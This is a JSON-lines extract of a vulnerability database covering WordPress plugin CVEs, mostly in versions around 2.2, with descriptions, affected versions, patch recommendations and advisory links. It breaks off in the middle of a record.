{"CVE_ID":"CVE-2023-3133","slug":"tutor","versionEndExcluding":"2.2.1","description":"The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.2.0\\\/classes\\\/RestAPI.php#L253\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.2.0\\\/classes\\\/RestAPI.php#L253\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b6969a7-5cbc-4e16-8f27-5dde481237f5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b6969a7-5cbc-4e16-8f27-5dde481237f5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12635","slug":"wp-docs","versionImpact":"2.2.0","versionEndExcluding":"2.2.1","description":"The WP Docs plugin for WordPress is vulnerable to time-based SQL Injection via the 'dir_id' parameter in all versions up to, and including, 2.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The vulnerability was partially patched in version 2.2.0.","recommendation":"Update to version 2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-docs\\\/tags\\\/2.1.8\\\/inc\\\/functions.php#L1963\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-docs\\\/tags\\\/2.1.8\\\/inc\\\/functions.php#L1963\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210644\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210644\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210656\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210656\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cbbfe66-09fe-48c9-9af1-0b7b90ac222a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cbbfe66-09fe-48c9-9af1-0b7b90ac222a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7492","slug":"mainwp-child-reports","versionImpact":"2.2","versionEndExcluding":"2.2.1","description":"The MainWP Child Reports plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances.","recommendation":"Update to version 2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdd7971c-6f1c-437a-832c-e2b2817a197e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdd7971c-6f1c-437a-832c-e2b2817a197e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child-reports\\\/trunk\\\/classes\\\/class-network.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child-reports\\\/trunk\\\/classes\\\/class-network.php#L346\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131718%40mainwp-child-reports&new=3131718%40mainwp-child-reports&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131718%40mainwp-child-reports&new=3131718%40mainwp-child-reports&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9829","slug":"download-plugin","versionImpact":"2.2.0","versionEndExcluding":"2.2.1","description":"The Download Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability checks on the 'dpwap_handle_download_user' and 'dpwap_handle_download_comment' functions in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download any comment, and download metadata for any user including user PII and sensitive information including username, email, hashed passwords and application passwords, session token information and more depending on set up and additional plugins installed.","recommendation":"Update to version 2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0891211-e4b3-4dcf-8ee0-e20abeb91640?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0891211-e4b3-4dcf-8ee0-e20abeb91640?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170600\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170600\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2337","slug":"convertkit","versionEndExcluding":"2.2.1","description":"The ConvertKit WordPress plugin before 2.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5a6f834-80a4-406b-acae-57ffeec2e689\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5a6f834-80a4-406b-acae-57ffeec2e689\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6555","slug":"wp-popups-lite","versionImpact":"2.2.0.1","versionEndExcluding":"2.2.0.2","description":"The WP Popups \u2013 WordPress Popup builder plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.0.1. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/578892f2-9841-4493-8445-61b79feb4764?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/578892f2-9841-4493-8445-61b79feb4764?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115849%40wp-popups-lite&new=3115849%40wp-popups-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115849%40wp-popups-lite&new=3115849%40wp-popups-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11450","slug":"onlyoffice","versionImpact":"2.0.0","versionEndExcluding":"2.2.0","description":"The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200917%40onlyoffice&new=3200917%40onlyoffice\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200917%40onlyoffice&new=3200917%40onlyoffice\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b71264-5b0f-41cb-86c1-a052d1976597?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b71264-5b0f-41cb-86c1-a052d1976597?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4099","slug":"list-children","versionImpact":"2.1","versionEndExcluding":"2.2.0","description":"The List Children plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'list_children' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/list-children\\\/trunk\\\/list_children.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/list-children\\\/trunk\\\/list_children.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284430\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284430\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538b4d4b-f8c6-44db-89d2-d345bfbfecb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538b4d4b-f8c6-44db-89d2-d345bfbfecb2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10340","slug":"ultimate-shortcodes-creator","versionImpact":"2.1.3","versionEndExcluding":"2.2.0","description":"The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'scu' shortcode in versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a9d6c71-98ce-4fa7-817a-43e4f3dc0602?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a9d6c71-98ce-4fa7-817a-43e4f3dc0602?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/frontend\\\/class-frontend.php?rev=2338595#L163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/frontend\\\/class-frontend.php?rev=2338595#L163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181163\\\/ultimate-shortcodes-creator#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181163\\\/ultimate-shortcodes-creator#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10551","slug":"simple-side-tab","versionImpact":"2.1.14","versionEndExcluding":"2.2.0","description":"The Sticky Social Icons WordPress plugin through 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd1aea4a-e5a6-4f87-805d-459b293bbf28\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd1aea4a-e5a6-4f87-805d-459b293bbf28\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11183","slug":"simple-side-tab","versionImpact":"2.1.14","versionEndExcluding":"2.2.0","description":"The Simple Side Tab WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff3f2788-d1a1-4a62-a247-39a931308f51\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff3f2788-d1a1-4a62-a247-39a931308f51\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6592","slug":"fastdup","versionImpact":"2.1.9","versionEndExcluding":"2.2.0","description":"The FastDup WordPress plugin before 2.2 does not prevent directory listing in sensitive directories containing export files.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a39bb807-b143-4863-88ff-1783e407d7d4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a39bb807-b143-4863-88ff-1783e407d7d4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7717","slug":"wp-events-manager","versionImpact":"2.1.11","versionEndExcluding":"2.2.0","description":"The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88dc08ff-3966-4606-855c-57c25552599e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88dc08ff-3966-4606-855c-57c25552599e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/trunk\\\/inc\\\/class-wpems-post-types.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/trunk\\\/inc\\\/class-wpems-post-types.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/tags\\\/2.2.0\\\/inc\\\/class-wpems-post-types.php?rev=3144021\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/tags\\\/2.2.0\\\/inc\\\/class-wpems-post-types.php?rev=3144021\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2493","slug":"all-in-one-redirection","versionEndExcluding":"2.2.0","description":"The All In One Redirection WordPress plugin before 2.2.0 does not properly sanitise and escape multiple parameters before using them in an SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a205a4-eef9-4f30-877a-4c562930650c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a205a4-eef9-4f30-877a-4c562930650c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4823","slug":"wp-meta-and-date-remover","versionEndExcluding":"2.2.0","description":"The WP Meta and Date Remover WordPress plugin before 2.2.0 provides an AJAX endpoint for configuring the plugin settings. This endpoint has no capability checks and does not sanitize the user input, which is then later output unescaped. Allowing any authenticated users, such as subscriber change them and perform Stored Cross-Site Scripting.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f53e27-d8d2-4fa3-91f9-447037508d30\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f53e27-d8d2-4fa3-91f9-447037508d30\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5741","slug":"powr-pack","versionImpact":"2.1.0","versionEndExcluding":"2.2.0","description":"The POWR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'powr-powr-pack' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2967eae-82bb-4556-a21a-c5bb6b905c62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2967eae-82bb-4556-a21a-c5bb6b905c62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L201\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-52185","slug":"everest-backup","versionEndExcluding":"2.2.0","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Everestthemes Everest Backup \u2013 WordPress Cloud Backup, Migration, Restore & Cloning Plugin.This issue affects Everest Backup \u2013 WordPress Cloud Backup, Migration, Restore & Cloning Plugin: from n\/a through 2.1.9.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/everest-backup\\\/wordpress-everest-backup-plugin-2-1-9-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/everest-backup\\\/wordpress-everest-backup-plugin-2-1-9-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0836","slug":"review-schema","versionImpact":"2.1.14","versionEndExcluding":"2.2.0","description":"The WordPress Review & Structure Data Schema Plugin \u2013 Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028627\\\/review-schema\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/Review.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028627\\\/review-schema\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/Review.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3292","slug":"grid-kit-premium","versionEndExcluding":"2.2.0","description":"The grid-kit-premium WordPress plugin before 2.2.0 does not escape some parameters as well as generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d993c385-c3ad-49a6-b079-3a1b090864c8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d993c385-c3ad-49a6-b079-3a1b090864c8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0615","slug":"content-control","versionImpact":"2.1.0","versionEndExcluding":"2.2.0","description":"The Content Control \u2013 The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.0 via the API. This makes it possible for unauthenticated attackers to extract post titles, IDs, slugs, statuses and other information including post content. This includes published content only.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54272","slug":"radius-blocks","versionImpact":"2.1.2","versionEndExcluding":"2.2.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RadiusTheme Radius Blocks \u2013 WordPress Gutenberg Blocks allows Stored XSS.This issue affects Radius Blocks \u2013 WordPress Gutenberg Blocks: from n\/a through 2.1.2.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/radius-blocks\\\/vulnerability\\\/wordpress-radius-blocks-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/radius-blocks\\\/vulnerability\\\/wordpress-radius-blocks-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3645","slug":"bit-form","versionEndExcluding":"2.2.0","description":"The Contact Form Builder by Bit Form WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c11f1e-6ea0-468c-b974-4aea9eb94b82\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c11f1e-6ea0-468c-b974-4aea9eb94b82\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13621","slug":"gdpr-framework","versionImpact":"2.1.0","versionEndExcluding":"2.2.0","description":"The GDPR Framework By Data443 WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b48ecbb-c459-4c39-825d-61744d36f2fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b48ecbb-c459-4c39-825d-61744d36f2fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6369","slug":"export-wp-page-to-static-html","versionImpact":"2.1.9","versionEndExcluding":"2.2.0","description":"The Export WP Page to Static HTML\/CSS plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on multiple AJAX actions in all versions up to, and including, 2.1.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to disclose sensitive information or perform unauthorized actions, such as saving advanced plugin settings.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47cb48aa-b556-4f25-ac68-ff0a812972c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47cb48aa-b556-4f25-ac68-ff0a812972c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/cancelRcExportProcess.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/cancelRcExportProcess.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/deleteExportedZipFile.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/deleteExportedZipFile.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/exportLogPercentage.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/exportLogPercentage.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/requestForWpPageToStaticHtml.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/requestForWpPageToStaticHtml.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/saveAdvancedSettings.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/saveAdvancedSettings.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/searchPosts.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/searchPosts.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/seeLogsInDetails.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/seeLogsInDetails.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\